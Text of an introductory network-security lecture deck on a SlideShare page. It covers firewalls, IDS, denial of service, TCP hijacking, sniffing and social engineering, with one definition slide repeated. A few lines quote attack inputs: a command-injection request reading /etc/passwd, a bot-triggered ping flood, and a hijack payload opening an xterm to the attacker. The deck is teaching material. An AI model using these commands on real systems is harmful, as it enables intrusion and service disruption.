SlideShare a Scribd company logo
1 of 51
1
Network Security
Mohammed Adam
2
A Brief History of the World
3
Overview
 What is security?
 Why do we need security?
 Who is vulnerable?
 Common security attacks and countermeasures
– Firewalls & Intrusion Detection Systems
– Denial of Service Attacks
– TCP Attacks
– Packet Sniffing
– Social Problems
4
What is “Security”
 Dictionary.com says:
– 1. Freedom from risk or danger; safety.
– 2. Freedom from doubt, anxiety, or fear; confidence.
– 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security
if a visitor acts suspicious.
• 2. Measures adopted by a government to prevent espionage,
sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to
prevent a crime such as burglary or assault: Security was lax at
the firm's smaller plant.
…etc.
5
What is “Security”
 Dictionary.com says:
– 1. Freedom from risk or danger; safety.
– 2. Freedom from doubt, anxiety, or fear; confidence.
– 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security
if a visitor acts suspicious.
• 2. Measures adopted by a government to prevent espionage,
sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to
prevent a crime such as burglary or assault: Security was lax at
the firm's smaller plant.
…etc.
6
What is “Security”
 Dictionary.com says:
– 1. Freedom from risk or danger; safety.
– 2. Freedom from doubt, anxiety, or fear; confidence.
– 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security
if a visitor acts suspicious.
• 2. Measures adopted by a government to prevent espionage,
sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to
prevent a crime such as burglary or assault: Security was lax at
the firm's smaller plant.
…etc.
7
What is “Security”
 Dictionary.com says:
– 1. Freedom from risk or danger; safety.
– 2. Freedom from doubt, anxiety, or fear; confidence.
– 3. Something that gives or assures safety, as:
• 1. A group or department of private guards: Call building security
if a visitor acts suspicious.
• 2. Measures adopted by a government to prevent espionage,
sabotage, or attack.
• 3. Measures adopted, as by a business or homeowner, to
prevent a crime such as burglary or assault: Security was lax at
the firm's smaller plant.
…etc.
8
Why do we need security?
 Protect vital information while still allowing
access to those who need it
– Trade secrets, medical records, etc.
 Provide authentication and access control for
resources
– Ex: AFS
 Guarantee availability of resources
– Ex: 5 9’s (99.999% reliability)
9
Who is vulnerable?
 Financial institutions and banks
 Internet service providers
 Pharmaceutical companies
 Government and defense agencies
 Contractors to various government agencies
 Multinational corporations
 ANYONE ON THE NETWORK
10
Common security attacks and
their countermeasures
 Finding a way into the network
– Firewalls
 Exploiting software bugs, buffer overflows
– Intrusion Detection Systems
 Denial of Service
– Ingress filtering, IDS
 TCP hijacking
– IPSec
 Packet sniffing
– Encryption (SSH, SSL, HTTPS)
 Social problems
– Education
11
Firewalls
 Basic problem – many network applications
and protocols have security problems that
are fixed over time
– Difficult for users to keep up with changes and
keep host secure
– Solution
• Administrators limit access to end hosts by using a
firewall
• Firewall is kept up-to-date by administrators
12
Firewalls
 A firewall is like a castle with a drawbridge
– Only one point of access into the network
– This can be good or bad
 Can be hardware or software
– Ex. Some routers come with firewall functionality
– ipfw, ipchains, pf on Unix systems, Windows XP
and Mac OS X have built in firewalls
13
Firewalls
Intranet
DMZInternet
Firewall
Firewall
Web server, email
server, web proxy,
etc
14
Firewalls
 Used to filter packets based on a combination of
features
– These are called packet filtering firewalls
• There are other types too, but they will not be discussed
– Ex. Drop packets with destination port of 23 (Telnet)
– Can use any combination of IP/UDP/TCP header
information
– man ipfw on unix47 for much more detail
 But why don’t we just turn Telnet off?
15
Firewalls
 Here is what a computer with a default
Windows XP install looks like:
– 135/tcp open loc-srv
– 139/tcp open netbios-ssn
– 445/tcp open microsoft-ds
– 1025/tcp open NFS-or-IIS
– 3389/tcp open ms-term-serv
– 5000/tcp open UPnP
 Might need some of these services, or might
not be able to control all the machines on the
network
16
Firewalls
 What does a firewall rule look like?
– Depends on the firewall used
 Example: ipfw
– /sbin/ipfw add deny tcp from cracker.evil.org to
wolf.tambov.su telnet
 Other examples: WinXP & Mac OS X have
built in and third party firewalls
– Different graphical user interfaces
– Varying amounts of complexity and power
17
Intrusion Detection
 Used to monitor for “suspicious activity” on a
network
– Can protect against known software exploits, like
buffer overflows
 Open Source IDS: Snort, www.snort.org
18
Intrusion Detection
 Uses “intrusion signatures”
– Well known patterns of behavior
• Ping sweeps, port scanning, web server indexing, OS
fingerprinting, DoS attempts, etc.
 Example
– IRIX vulnerability in webdist.cgi
– Can make a rule to drop packets containing the line
• “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”
 However, IDS is only useful if contingency plans are
in place to curb attacks as they are occurring
19
Minor Detour…
 Say we got the /etc/passwd file from the IRIX
server
 What can we do with it?
20
Dictionary Attack
 We can run a dictionary attack on the passwords
– The passwords in /etc/passwd are encrypted with the
crypt(3) function (one-way hash)
– Can take a dictionary of words, crypt() them all, and
compare with the hashed passwords
 This is why your passwords should be meaningless
random junk!
– For example, “sdfo839f” is a good password
• That is not my andrew password
• Please don’t try it either
21
Denial of Service
 Purpose: Make a network service unusable,
usually by overloading the server or network
 Many different kinds of DoS attacks
– SYN flooding
– SMURF
– Distributed attacks
– Mini Case Study: Code-Red
22
Denial of Service
 SYN flooding attack
 Send SYN packets with bogus source address
– Why?
 Server responds with SYN ACK and keeps state
about TCP half-open connection
– Eventually, server memory is exhausted with this state
 Solution: use “SYN cookies”
– In response to a SYN, create a special “cookie” for the
connection, and forget everything else
– Then, can recreate the forgotten information when the
ACK comes in from a legitimate connection
23
Denial of Service
24
Denial of Service
 SMURF
– Source IP address of a broadcast ping is forged
– Large number of machines respond back to
victim, overloading it
25
Denial of Service
I n t e r n e t
P e r p e t r a t o r V ic t im
I C M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im )
S e n t t o I P b r o a d c a s t a d d r e s s
I C M P e c h o r e p ly
26
Denial of Service
 Distributed Denial of Service
– Same techniques as regular DoS, but on a much larger
scale
– Example: Sub7Server Trojan and IRC bots
• Infect a large number of machines with a “zombie” program
• Zombie program logs into an IRC channel and awaits commands
• Example:
– Bot command: !p4 207.71.92.193
– Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
– Sends 10,000 64k packets to the host (655MB!)
• Read more at: http://grc.com/dos/grcdos.htm
27
Denial of Service
 Mini Case Study – CodeRed
– July 19, 2001: over 359,000 computers infected
with Code-Red in less than 14 hours
– Used a recently known buffer exploit in Microsoft
IIS
– Damages estimated in excess of $2.6 billion
28
Denial of Service
 Why is this under the Denial of Service
category?
– CodeRed launched a DDOS attack against
www1.whitehouse.gov from the 20th to the 28th
of every month!
– Spent the rest of its time infecting other hosts
29
Denial of Service
 How can we protect ourselves?
– Ingress filtering
• If the source IP of a packet comes in on an interface
which does not have a route to that packet, then drop
it
• RFC 2267 has more information about this
– Stay on top of CERT advisories and the latest
security patches
• A fix for the IIS buffer overflow was released sixteen
days before CodeRed had been deployed!
30
TCP Attacks
 Recall how IP works…
– End hosts create IP packets and routers process
them purely based on destination address alone
 Problem: End hosts may lie about other
fields which do not affect delivery
– Source address – host may trick destination into
believing that the packet is from a trusted source
• Especially applications which use IP addresses as a
simple authentication method
• Solution – use better authentication methods
31
TCP Attacks
 TCP connections have associated state
– Starting sequence numbers, port numbers
 Problem – what if an attacker learns these
values?
– Port numbers are sometimes well known to begin
with (ex. HTTP uses port 80)
– Sequence numbers are sometimes chosen in
very predictable ways
32
TCP Attacks
 If an attacker learns the associated TCP
state for the connection, then the connection
can be hijacked!
 Attacker can insert malicious data into the
TCP stream, and the recipient will believe it
came from the original source
– Ex. Instead of downloading and running new
program, you download a virus and execute it
33
TCP Attacks
 Say hello to Alice, Bob and Mr. Big Ears
34
TCP Attacks
 Alice and Bob have an established TCP
connection
35
TCP Attacks
 Mr. Big Ears lies on the path between Alice
and Bob on the network
– He can intercept all of their packets
36
TCP Attacks
 First, Mr. Big Ears must drop all of Alice’s
packets since they must not be delivered to
Bob (why?)
Packets
The Void
37
TCP Attacks
 Then, Mr. Big Ears sends his malicious
packet with the next ISN (sniffed from the
network)
ISN, SRC=Alice
38
TCP Attacks
 What if Mr. Big Ears is unable to sniff the
packets between Alice and Bob?
– Can just DoS Alice instead of dropping her
packets
– Can just send guesses of what the ISN is until it
is accepted
 How do you know when the ISN is accepted?
– Mitnick: payload is “add self to .rhosts”
– Or, “xterm -display MrBigEars:0”
39
TCP Attacks
 Why are these types of TCP attacks so
dangerous?
Web server
Malicious user
Trusting web client
40
TCP Attacks
 How do we prevent this?
 IPSec
– Provides source authentication, so Mr. Big Ears
cannot pretend to be Alice
– Encrypts data before transport, so Mr. Big Ears
cannot talk to Bob without knowing what the
session key is
41
Packet Sniffing
 Recall how Ethernet works …
 When someone wants to send a packet to
some else …
 They put the bits on the wire with the
destination MAC address …
 And remember that other hosts are listening
on the wire to detect for collisions …
 It couldn’t get any easier to figure out what
data is being transmitted over the network!
42
Packet Sniffing
 This works for wireless too!
 In fact, it works for any broadcast-based
medium
43
Packet Sniffing
 What kinds of data can we get?
 Asked another way, what kind of information
would be most useful to a malicious user?
 Answer: Anything in plain text
– Passwords are the most popular
44
Packet Sniffing
 How can we protect ourselves?
 SSH, not Telnet
– Many people at CMU still use Telnet and send their password in the
clear (use PuTTY instead!)
– Now that I have told you this, please do not exploit this information
– Packet sniffing is, by the way, prohibited by Computing Services
 HTTP over SSL
– Especially when making purchases with credit cards!
 SFTP, not FTP
– Unless you really don’t care about the password or data
– Can also use KerbFTP (download from MyAndrew)
 IPSec
– Provides network-layer confidentiality
45
Social Problems
 People can be just as dangerous as
unprotected computer systems
– People can be lied to, manipulated, bribed,
threatened, harmed, tortured, etc. to give up
valuable information
– Most humans will breakdown once they are at
the “harmed” stage, unless they have been
specially trained
• Think government here…
46
Social Problems
 Fun Example 1:
– “Hi, I’m your AT&T rep, I’m stuck on a pole. I
need you to punch a bunch of buttons for me”
47
Social Problems
 Fun Example 2:
– Someone calls you in the middle of the night
• “Have you been calling Egypt for the last six hours?”
• “No”
• “Well, we have a call that’s actually active right now,
it’s on your calling card and it’s to Egypt and as a
matter of fact, you’ve got about $2000 worth of
charges on your card and … read off your AT&T card
number and PIN and then I’ll get rid of the charge for
you”
48
Social Problems
 Fun Example 3:
– Who saw Office Space?
– In the movie, the three disgruntled employees
installed a money-stealing worm onto the
companies systems
– They did this from inside the company, where
they had full access to the companies systems
• What security techniques can we use to prevent this
type of access?
49
Social Problems
 There aren’t always solutions to all of these problems
– Humans will continue to be tricked into giving out information they
shouldn’t
– Educating them may help a little here, but, depending on how bad
you want the information, there are a lot of bad things you can do to
get it
 So, the best that can be done is to implement a wide variety
of solutions and more closely monitor who has access to
what network resources and information
– But, this solution is still not perfect
50
Conclusions
 The Internet works only because we implicitly
trust one another
 It is very easy to exploit this trust
 The same holds true for software
 It is important to stay on top of the latest
CERT security advisories to know how to
patch any security holes
51
Security related URLs
 http://www.robertgraham.com/pubs/network-
intrusion-detection.html
 http://online.securityfocus.com/infocus/1527
 http://www.snort.org/
 http://www.cert.org/
 http://www.nmap.org/
 http://grc.com/dos/grcdos.htm
 http://lcamtuf.coredump.cx/newtcp/

More Related Content

What's hot

What's hot (20)

Internet security
Internet securityInternet security
Internet security
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Course on Ehtical Hacking - Introduction
Course on Ehtical Hacking - IntroductionCourse on Ehtical Hacking - Introduction
Course on Ehtical Hacking - Introduction
 
A Look Into Cyber Security
A Look Into Cyber SecurityA Look Into Cyber Security
A Look Into Cyber Security
 
Dos and Don'ts of Internet Security
Dos and Don'ts of Internet SecurityDos and Don'ts of Internet Security
Dos and Don'ts of Internet Security
 
Basic Internet Security
Basic Internet SecurityBasic Internet Security
Basic Internet Security
 
Cyber security
Cyber securityCyber security
Cyber security
 
Internet security
Internet securityInternet security
Internet security
 
Cyber security awareness for end users
Cyber security awareness for end usersCyber security awareness for end users
Cyber security awareness for end users
 
Cyber security
Cyber securityCyber security
Cyber security
 
Ethical Hacking & Network Security
Ethical Hacking & Network Security Ethical Hacking & Network Security
Ethical Hacking & Network Security
 
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
cyber crime, Cyber Security, Introduction, Umakant Bhaskar Gohatre
 
Cyber security
Cyber securityCyber security
Cyber security
 
Computer Security Threats
Computer Security ThreatsComputer Security Threats
Computer Security Threats
 
Cyber security
Cyber securityCyber security
Cyber security
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Computer Security
Computer SecurityComputer Security
Computer Security
 
Cyber Attack Methodologies
Cyber Attack MethodologiesCyber Attack Methodologies
Cyber Attack Methodologies
 
Pranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-pptPranavi verma-cyber-security-ppt
Pranavi verma-cyber-security-ppt
 
What is Importance of Cyber Security
What is Importance of Cyber Security What is Importance of Cyber Security
What is Importance of Cyber Security
 

Similar to Network Security

Lec21 security
Lec21 securityLec21 security
Lec21 securitysureshfsp
 
Lecture 12 -_internet_security
Lecture 12 -_internet_securityLecture 12 -_internet_security
Lecture 12 -_internet_securitySerious_SamSoul
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentalsTariq kanher
 
Lesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptxLesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptxcalf_ville86
 
EC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR KEC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR Kpraveenme12
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.pptarrenfill
 
my lecture 21.network security.2023.ppt
my lecture 21.network security.2023.pptmy lecture 21.network security.2023.ppt
my lecture 21.network security.2023.ppthalosidiq1
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppttahaniali27
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.pptramana899986
 
INTERNET SECURITY.ppt
INTERNET SECURITY.pptINTERNET SECURITY.ppt
INTERNET SECURITY.pptAVUDAI1
 
lec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.pptlec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.pptnavidkamrava
 

Similar to Network Security (20)

Network security
Network securityNetwork security
Network security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
Network security
Network securityNetwork security
Network security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Lecture 12 -_internet_security
Lecture 12 -_internet_securityLecture 12 -_internet_security
Lecture 12 -_internet_security
 
Lec21 security
Lec21 securityLec21 security
Lec21 security
 
lec security
lec securitylec security
lec security
 
Network seurity
Network seurityNetwork seurity
Network seurity
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
 
Lesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptxLesson 3 - Network Security.pptx
Lesson 3 - Network Security.pptx
 
EC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR KEC3401 Networks security PRAVEEN KUMAR K
EC3401 Networks security PRAVEEN KUMAR K
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
network.ppt
network.pptnetwork.ppt
network.ppt
 
my lecture 21.network security.2023.ppt
my lecture 21.network security.2023.pptmy lecture 21.network security.2023.ppt
my lecture 21.network security.2023.ppt
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
Network Security
Network SecurityNetwork Security
Network Security
 
lec21-security.ppt
lec21-security.pptlec21-security.ppt
lec21-security.ppt
 
INTERNET SECURITY.ppt
INTERNET SECURITY.pptINTERNET SECURITY.ppt
INTERNET SECURITY.ppt
 
lec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.pptlec21-securitytcp attacks and others.ppt
lec21-securitytcp attacks and others.ppt
 

More from Mohammed Adam

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Mohammed Adam
 
Android Penetration testing - Day 2
 Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2Mohammed Adam
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Mohammed Adam
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration TestingMohammed Adam
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration TestingMohammed Adam
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For CybersecurityMohammed Adam
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceMohammed Adam
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profitMohammed Adam
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network FundamentalsMohammed Adam
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authenticationMohammed Adam
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamMohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram communityMohammed Adam
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamMohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Mohammed Adam
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityMohammed Adam
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamMohammed Adam
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Mohammed Adam
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolMohammed Adam
 
Networking in Windows Operating System
Networking in Windows Operating SystemNetworking in Windows Operating System
Networking in Windows Operating SystemMohammed Adam
 

More from Mohammed Adam (20)

Android Penetration Testing - Day 3
Android Penetration Testing - Day 3Android Penetration Testing - Day 3
Android Penetration Testing - Day 3
 
Android Penetration testing - Day 2
 Android Penetration testing - Day 2 Android Penetration testing - Day 2
Android Penetration testing - Day 2
 
Android Penetration Testing - Day 1
Android Penetration Testing - Day 1Android Penetration Testing - Day 1
Android Penetration Testing - Day 1
 
Wireless Penetration Testing
Wireless Penetration TestingWireless Penetration Testing
Wireless Penetration Testing
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Basic Foundation For Cybersecurity
Basic Foundation For CybersecurityBasic Foundation For Cybersecurity
Basic Foundation For Cybersecurity
 
Golden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain PersistenceGolden Ticket Attack - AD - Domain Persistence
Golden Ticket Attack - AD - Domain Persistence
 
Evading Antivirus software for fun and profit
Evading Antivirus software for fun and profitEvading Antivirus software for fun and profit
Evading Antivirus software for fun and profit
 
Introduction to Network Fundamentals
Introduction to Network FundamentalsIntroduction to Network Fundamentals
Introduction to Network Fundamentals
 
Breaking out of crypto authentication
Breaking out of crypto authenticationBreaking out of crypto authentication
Breaking out of crypto authentication
 
Career Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed AdamCareer Guidance on Cybersecurity by Mohammed Adam
Career Guidance on Cybersecurity by Mohammed Adam
 
Introduction to null villupuram community
Introduction to null villupuram communityIntroduction to null villupuram community
Introduction to null villupuram community
 
Internet security
Internet securityInternet security
Internet security
 
BugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed AdamBugBounty Roadmap with Mohammed Adam
BugBounty Roadmap with Mohammed Adam
 
Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2Webinar On Ethical Hacking & Cybersecurity - Day2
Webinar On Ethical Hacking & Cybersecurity - Day2
 
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurityOSINT - Open Soure Intelligence - Webinar on CyberSecurity
OSINT - Open Soure Intelligence - Webinar on CyberSecurity
 
Android Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed AdamAndroid Application Penetration Testing - Mohammed Adam
Android Application Penetration Testing - Mohammed Adam
 
Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics Vulnerability assessment & Penetration testing Basics
Vulnerability assessment & Penetration testing Basics
 
What is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) ProtocolWhat is SSL ? The Secure Sockets Layer (SSL) Protocol
What is SSL ? The Secure Sockets Layer (SSL) Protocol
 
Networking in Windows Operating System
Networking in Windows Operating SystemNetworking in Windows Operating System
Networking in Windows Operating System
 

Recently uploaded

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 

Recently uploaded (20)

SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 

Network Security

  • 2. 2 A Brief History of the World
  • 3. 3 Overview  What is security?  Why do we need security?  Who is vulnerable?  Common security attacks and countermeasures – Firewalls & Intrusion Detection Systems – Denial of Service Attacks – TCP Attacks – Packet Sniffing – Social Problems
